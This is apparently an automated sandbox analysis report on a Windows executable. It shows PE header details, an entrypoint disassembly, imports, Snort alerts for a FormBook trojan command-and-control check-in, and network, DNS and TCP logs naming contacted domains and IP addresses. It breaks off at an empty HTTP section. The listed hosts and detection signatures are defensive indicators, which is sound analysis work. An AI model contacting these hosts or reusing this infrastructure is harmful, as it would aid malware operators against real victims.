                                                                                                          File Version Major:4
                                                                                                          File Version Minor:0
                                                                                                          Subsystem Version Major:4
                                                                                                          Subsystem Version Minor:0
                                                                                                          Import Hash:099c0646ea7282d232219f8807883be0

                                                                                                          Entrypoint Preview

                                                                                                          Instruction
                                                                                                          sub esp, 00000180h
                                                                                                          push ebx
                                                                                                          push ebp
                                                                                                          push esi
                                                                                                          xor ebx, ebx
                                                                                                          push edi
                                                                                                          mov dword ptr [esp+18h], ebx
                                                                                                          mov dword ptr [esp+10h], 00409130h
                                                                                                          xor esi, esi
                                                                                                          mov byte ptr [esp+14h], 00000020h
                                                                                                          call dword ptr [00407030h]
                                                                                                          push 00008001h
                                                                                                          call dword ptr [004070B4h]
                                                                                                          push ebx
                                                                                                          call dword ptr [0040727Ch]
                                                                                                          push 00000008h
                                                                                                          mov dword ptr [00423F58h], eax
                                                                                                          call 00007FD84476DCAEh
                                                                                                          mov dword ptr [00423EA4h], eax
                                                                                                          push ebx
                                                                                                          lea eax, dword ptr [esp+34h]
                                                                                                          push 00000160h
                                                                                                          push eax
                                                                                                          push ebx
                                                                                                          push 0041F458h
                                                                                                          call dword ptr [00407158h]
                                                                                                          push 004091B8h
                                                                                                          push 004236A0h
                                                                                                          call 00007FD84476D961h
                                                                                                          call dword ptr [004070B0h]
                                                                                                          mov edi, 00429000h
                                                                                                          push eax
                                                                                                          push edi
                                                                                                          call 00007FD84476D94Fh
                                                                                                          push ebx
                                                                                                          call dword ptr [0040710Ch]
                                                                                                          cmp byte ptr [00429000h], 00000022h
                                                                                                          mov dword ptr [00423EA0h], eax
                                                                                                          mov eax, edi
                                                                                                          jne 00007FD84476B0ACh
                                                                                                          mov byte ptr [esp+14h], 00000022h
                                                                                                          mov eax, 00429001h
                                                                                                          push dword ptr [esp+14h]
                                                                                                          push eax
                                                                                                          call 00007FD84476D442h
                                                                                                          push eax
                                                                                                          call dword ptr [0040721Ch]
                                                                                                          mov dword ptr [esp+1Ch], eax
                                                                                                          jmp 00007FD84476B105h
                                                                                                          cmp cl, 00000020h
                                                                                                          jne 00007FD84476B0A8h
                                                                                                          inc eax
                                                                                                          cmp byte ptr [eax], 00000020h
                                                                                                          je 00007FD84476B09Ch
                                                                                                          cmp byte ptr [eax], 00000022h
                                                                                                          mov byte ptr [eax+eax+00h], 00000000h

                                                                                                          Rich Headers

                                                                                                          Programming Language:
                                                                                                          • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                          Data Directories

                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x9e0.rsrc
                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                          Sections

                                                                                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x10000x5a5a0x5c00False0.660453464674data6.41769823686IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                          .rdata0x70000x11900x1200False0.4453125data5.18162709925IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .data0x90000x1af980x400False0.55859375data4.70902740305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                          .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x2c0000x9e00xa00False0.45625data4.51012867721IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                          Resources

                                                                                                          NameRVASizeTypeLanguageCountry
                                                                                                          RT_ICON0x2c1900x2e8dataEnglishUnited States
                                                                                                          RT_DIALOG0x2c4780x100dataEnglishUnited States
                                                                                                          RT_DIALOG0x2c5780x11cdataEnglishUnited States
                                                                                                          RT_DIALOG0x2c6980x60dataEnglishUnited States
                                                                                                          RT_GROUP_ICON0x2c6f80x14dataEnglishUnited States
                                                                                                          RT_MANIFEST0x2c7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                          Imports

                                                                                                          DLLImport
                                                                                                          KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
                                                                                                          USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                          GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                          SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                          ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                          ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                          VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                          Possible Origin

                                                                                                          Language of compilation systemCountry where language is spokenMap
                                                                                                          EnglishUnited States

                                                                                                          Network Behavior

                                                                                                          Snort IDS Alerts

                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                          06/11/21-08:55:04.602555ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                                                          06/11/21-08:55:05.651055ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                                                          06/11/21-08:55:07.699033ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.68.8.8.8
                                                                                                          06/11/21-08:55:14.730818TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6185.224.138.83
                                                                                                          06/11/21-08:55:14.730818TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6185.224.138.83
                                                                                                          06/11/21-08:55:14.730818TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974880192.168.2.6185.224.138.83

                                                                                                          Network Port Distribution

                                                                                                          TCP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jun 11, 2021 08:55:08.907310009 CEST4974780192.168.2.6154.215.150.183
                                                                                                          Jun 11, 2021 08:55:09.183316946 CEST8049747154.215.150.183192.168.2.6
                                                                                                          Jun 11, 2021 08:55:09.183506966 CEST4974780192.168.2.6154.215.150.183
                                                                                                          Jun 11, 2021 08:55:09.183716059 CEST4974780192.168.2.6154.215.150.183
                                                                                                          Jun 11, 2021 08:55:09.459450006 CEST8049747154.215.150.183192.168.2.6
                                                                                                          Jun 11, 2021 08:55:09.463644028 CEST8049747154.215.150.183192.168.2.6
                                                                                                          Jun 11, 2021 08:55:09.463757038 CEST8049747154.215.150.183192.168.2.6
                                                                                                          Jun 11, 2021 08:55:09.463888884 CEST4974780192.168.2.6154.215.150.183
                                                                                                          Jun 11, 2021 08:55:09.463996887 CEST4974780192.168.2.6154.215.150.183
                                                                                                          Jun 11, 2021 08:55:09.738563061 CEST8049747154.215.150.183192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.680730104 CEST4974880192.168.2.6185.224.138.83
                                                                                                          Jun 11, 2021 08:55:14.730499983 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.730671883 CEST4974880192.168.2.6185.224.138.83
                                                                                                          Jun 11, 2021 08:55:14.730818033 CEST4974880192.168.2.6185.224.138.83
                                                                                                          Jun 11, 2021 08:55:14.780528069 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.783538103 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.783576965 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.783593893 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.783745050 CEST4974880192.168.2.6185.224.138.83
                                                                                                          Jun 11, 2021 08:55:14.783894062 CEST4974880192.168.2.6185.224.138.83
                                                                                                          Jun 11, 2021 08:55:14.784004927 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.784123898 CEST4974880192.168.2.6185.224.138.83
                                                                                                          Jun 11, 2021 08:55:14.833467007 CEST8049748185.224.138.83192.168.2.6
                                                                                                          Jun 11, 2021 08:55:20.106741905 CEST4975180192.168.2.6119.81.95.146
                                                                                                          Jun 11, 2021 08:55:20.305175066 CEST8049751119.81.95.146192.168.2.6
                                                                                                          Jun 11, 2021 08:55:20.305429935 CEST4975180192.168.2.6119.81.95.146
                                                                                                          Jun 11, 2021 08:55:20.305771112 CEST4975180192.168.2.6119.81.95.146
                                                                                                          Jun 11, 2021 08:55:20.504008055 CEST8049751119.81.95.146192.168.2.6
                                                                                                          Jun 11, 2021 08:55:20.505008936 CEST8049751119.81.95.146192.168.2.6
                                                                                                          Jun 11, 2021 08:55:20.505048037 CEST8049751119.81.95.146192.168.2.6
                                                                                                          Jun 11, 2021 08:55:20.505301952 CEST4975180192.168.2.6119.81.95.146
                                                                                                          Jun 11, 2021 08:55:20.505383015 CEST4975180192.168.2.6119.81.95.146
                                                                                                          Jun 11, 2021 08:55:20.703990936 CEST8049751119.81.95.146192.168.2.6
                                                                                                          Jun 11, 2021 08:55:25.699980974 CEST4975280192.168.2.6184.175.83.64
                                                                                                          Jun 11, 2021 08:55:25.861229897 CEST8049752184.175.83.64192.168.2.6
                                                                                                          Jun 11, 2021 08:55:25.861443043 CEST4975280192.168.2.6184.175.83.64
                                                                                                          Jun 11, 2021 08:55:25.861802101 CEST4975280192.168.2.6184.175.83.64
                                                                                                          Jun 11, 2021 08:55:26.023224115 CEST8049752184.175.83.64192.168.2.6
                                                                                                          Jun 11, 2021 08:55:26.352801085 CEST4975280192.168.2.6184.175.83.64
                                                                                                          Jun 11, 2021 08:55:26.555392981 CEST8049752184.175.83.64192.168.2.6
                                                                                                          Jun 11, 2021 08:55:27.224795103 CEST8049752184.175.83.64192.168.2.6
                                                                                                          Jun 11, 2021 08:55:27.224836111 CEST8049752184.175.83.64192.168.2.6
                                                                                                          Jun 11, 2021 08:55:27.225110054 CEST4975280192.168.2.6184.175.83.64
                                                                                                          Jun 11, 2021 08:55:27.225182056 CEST4975280192.168.2.6184.175.83.64
                                                                                                          Jun 11, 2021 08:55:31.713376045 CEST4975380192.168.2.6150.95.255.38
                                                                                                          Jun 11, 2021 08:55:32.020508051 CEST8049753150.95.255.38192.168.2.6
                                                                                                          Jun 11, 2021 08:55:32.020761967 CEST4975380192.168.2.6150.95.255.38
                                                                                                          Jun 11, 2021 08:55:32.021022081 CEST4975380192.168.2.6150.95.255.38
                                                                                                          Jun 11, 2021 08:55:32.327981949 CEST8049753150.95.255.38192.168.2.6
                                                                                                          Jun 11, 2021 08:55:32.328037977 CEST8049753150.95.255.38192.168.2.6
                                                                                                          Jun 11, 2021 08:55:32.328058958 CEST8049753150.95.255.38192.168.2.6
                                                                                                          Jun 11, 2021 08:55:32.328315020 CEST4975380192.168.2.6150.95.255.38
                                                                                                          Jun 11, 2021 08:55:32.328356981 CEST4975380192.168.2.6150.95.255.38
                                                                                                          Jun 11, 2021 08:55:32.635231972 CEST8049753150.95.255.38192.168.2.6
                                                                                                          Jun 11, 2021 08:55:37.425743103 CEST4975480192.168.2.6184.168.131.241
                                                                                                          Jun 11, 2021 08:55:37.621603012 CEST8049754184.168.131.241192.168.2.6
                                                                                                          Jun 11, 2021 08:55:37.621725082 CEST4975480192.168.2.6184.168.131.241
                                                                                                          Jun 11, 2021 08:55:37.621895075 CEST4975480192.168.2.6184.168.131.241
                                                                                                          Jun 11, 2021 08:55:37.815676928 CEST8049754184.168.131.241192.168.2.6
                                                                                                          Jun 11, 2021 08:55:37.868011951 CEST8049754184.168.131.241192.168.2.6
                                                                                                          Jun 11, 2021 08:55:37.868060112 CEST8049754184.168.131.241192.168.2.6
                                                                                                          Jun 11, 2021 08:55:37.868515968 CEST4975480192.168.2.6184.168.131.241
                                                                                                          Jun 11, 2021 08:55:37.868659019 CEST4975480192.168.2.6184.168.131.241
                                                                                                          Jun 11, 2021 08:55:38.063754082 CEST8049754184.168.131.241192.168.2.6

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Jun 11, 2021 08:53:28.748171091 CEST6426753192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:28.772994041 CEST4944853192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:28.798204899 CEST53642678.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:28.831573009 CEST53494488.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:29.575366974 CEST6034253192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:29.625926971 CEST53603428.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:29.912538052 CEST6134653192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:29.971339941 CEST53613468.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:31.241482973 CEST5177453192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:31.291564941 CEST53517748.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:32.226155996 CEST5602353192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:32.286700964 CEST53560238.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:33.765980959 CEST5838453192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:33.817195892 CEST53583848.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:34.567260027 CEST6026153192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:34.619024992 CEST53602618.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:35.625138044 CEST5606153192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:35.678283930 CEST53560618.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:37.415075064 CEST5833653192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:37.465636015 CEST53583368.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:38.450017929 CEST5378153192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:38.508734941 CEST53537818.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:39.420214891 CEST5406453192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:39.470349073 CEST53540648.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:41.324762106 CEST5281153192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:41.375246048 CEST53528118.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:42.792856932 CEST5529953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:42.857922077 CEST53552998.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:44.083930016 CEST6374553192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:44.135401011 CEST53637458.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:45.115511894 CEST5005553192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:45.169118881 CEST53500558.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:45.917996883 CEST6137453192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:45.971321106 CEST53613748.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:48.516494989 CEST5033953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:48.569454908 CEST53503398.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:49.725511074 CEST6330753192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:49.779050112 CEST53633078.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:53:51.321696997 CEST4969453192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:53:51.371913910 CEST53496948.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:04.719906092 CEST5498253192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:04.789838076 CEST53549828.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:29.080950022 CEST5001053192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:29.220621109 CEST53500108.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:30.560714960 CEST6371853192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:30.695548058 CEST53637188.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:32.433160067 CEST6211653192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:32.493107080 CEST53621168.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:32.976608038 CEST6381653192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:33.038295984 CEST53638168.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:33.641520023 CEST5501453192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:33.702112913 CEST53550148.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:34.126894951 CEST6220853192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:34.203109026 CEST53622088.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:34.358794928 CEST5757453192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:34.410713911 CEST53575748.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:35.248476028 CEST5181853192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:35.312026024 CEST53518188.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:37.320607901 CEST5662853192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:37.381854057 CEST53566288.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:38.643691063 CEST6077853192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:38.708317995 CEST53607788.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:39.615343094 CEST5379953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:39.673851967 CEST53537998.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:53.369669914 CEST5468353192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:53.437954903 CEST53546838.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:54:58.502868891 CEST5932953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:54:59.548690081 CEST5932953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:00.595551968 CEST5932953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:02.642966032 CEST5932953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:03.557312012 CEST53593298.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:04.602385044 CEST53593298.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:05.650899887 CEST53593298.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:06.459764957 CEST6402153192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:06.525445938 CEST53640218.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:07.697957039 CEST53593298.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:08.839224100 CEST5612953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:08.903072119 CEST53561298.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.503674984 CEST5817753192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:14.679604053 CEST53581778.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:14.702935934 CEST5070053192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:14.777853012 CEST53507008.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:17.314508915 CEST5406953192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:17.376267910 CEST53540698.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:19.808238029 CEST6117853192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:20.105509996 CEST53611788.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:25.518785954 CEST5701753192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:25.697938919 CEST53570178.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:31.419163942 CEST5632753192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:31.712347031 CEST53563278.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:37.343261957 CEST5024353192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:37.424470901 CEST53502438.8.8.8192.168.2.6
                                                                                                          Jun 11, 2021 08:55:42.870754004 CEST6205553192.168.2.68.8.8.8
                                                                                                          Jun 11, 2021 08:55:42.935358047 CEST53620558.8.8.8192.168.2.6

                                                                                                          ICMP Packets

                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                          Jun 11, 2021 08:55:04.602555037 CEST192.168.2.68.8.8.8cffd(Port unreachable)Destination Unreachable
                                                                                                          Jun 11, 2021 08:55:05.651055098 CEST192.168.2.68.8.8.8cffd(Port unreachable)Destination Unreachable
                                                                                                          Jun 11, 2021 08:55:07.699033022 CEST192.168.2.68.8.8.8cffd(Port unreachable)Destination Unreachable

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                          Jun 11, 2021 08:54:58.502868891 CEST192.168.2.68.8.8.80x392fStandard query (0)www.bluebeltpanobuy.comA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:54:59.548690081 CEST192.168.2.68.8.8.80x392fStandard query (0)www.bluebeltpanobuy.comA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:00.595551968 CEST192.168.2.68.8.8.80x392fStandard query (0)www.bluebeltpanobuy.comA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:02.642966032 CEST192.168.2.68.8.8.80x392fStandard query (0)www.bluebeltpanobuy.comA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:08.839224100 CEST192.168.2.68.8.8.80xb9a0Standard query (0)www.thechandeck.comA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:14.503674984 CEST192.168.2.68.8.8.80x8467Standard query (0)www.bancambios.networkA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:19.808238029 CEST192.168.2.68.8.8.80x15d8Standard query (0)www.purpleqube.comA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:25.518785954 CEST192.168.2.68.8.8.80x8775Standard query (0)www.middreampostal.comA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:31.419163942 CEST192.168.2.68.8.8.80xc2f9Standard query (0)www.xn---yado-8e4dze0c.siteA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:37.343261957 CEST192.168.2.68.8.8.80xc9dbStandard query (0)www.oceancollaborative.comA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:42.870754004 CEST192.168.2.68.8.8.80x73f9Standard query (0)www.t4mall.comA (IP address)IN (0x0001)

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                          Jun 11, 2021 08:55:03.557312012 CEST8.8.8.8192.168.2.60x392fServer failure (2)www.bluebeltpanobuy.comnonenoneA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:04.602385044 CEST8.8.8.8192.168.2.60x392fServer failure (2)www.bluebeltpanobuy.comnonenoneA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:05.650899887 CEST8.8.8.8192.168.2.60x392fServer failure (2)www.bluebeltpanobuy.comnonenoneA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:07.697957039 CEST8.8.8.8192.168.2.60x392fServer failure (2)www.bluebeltpanobuy.comnonenoneA (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:08.903072119 CEST8.8.8.8192.168.2.60xb9a0No error (0)www.thechandeck.com154.215.150.183A (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:14.679604053 CEST8.8.8.8192.168.2.60x8467No error (0)www.bancambios.networkbancambios.networkCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:14.679604053 CEST8.8.8.8192.168.2.60x8467No error (0)bancambios.network185.224.138.83A (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:20.105509996 CEST8.8.8.8192.168.2.60x15d8No error (0)www.purpleqube.compurpleqube.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:20.105509996 CEST8.8.8.8192.168.2.60x15d8No error (0)purpleqube.com119.81.95.146A (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:25.697938919 CEST8.8.8.8192.168.2.60x8775No error (0)www.middreampostal.commiddreampostal.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:25.697938919 CEST8.8.8.8192.168.2.60x8775No error (0)middreampostal.com184.175.83.64A (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:31.712347031 CEST8.8.8.8192.168.2.60xc2f9No error (0)www.xn---yado-8e4dze0c.site150.95.255.38A (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:37.424470901 CEST8.8.8.8192.168.2.60xc9dbNo error (0)www.oceancollaborative.comoceancollaborative.comCNAME (Canonical name)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:37.424470901 CEST8.8.8.8192.168.2.60xc9dbNo error (0)oceancollaborative.com184.168.131.241A (IP address)IN (0x0001)
                                                                                                          Jun 11, 2021 08:55:42.935358047 CEST8.8.8.8192.168.2.60x73f9No error (0)www.t4mall.com165.3.53.250A (IP address)IN (0x0001)

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • www.thechandeck.com
                                                                                                          • www.bancambios.network
                                                                                                          • www.purpleqube.com
                                                                                                          • www.middreampostal.com
                                                                                                          • www.xn---yado-8e4dze0c.site
                                                                                                          • www.oceancollaborative.com

                                                                                                          HTTP Packets

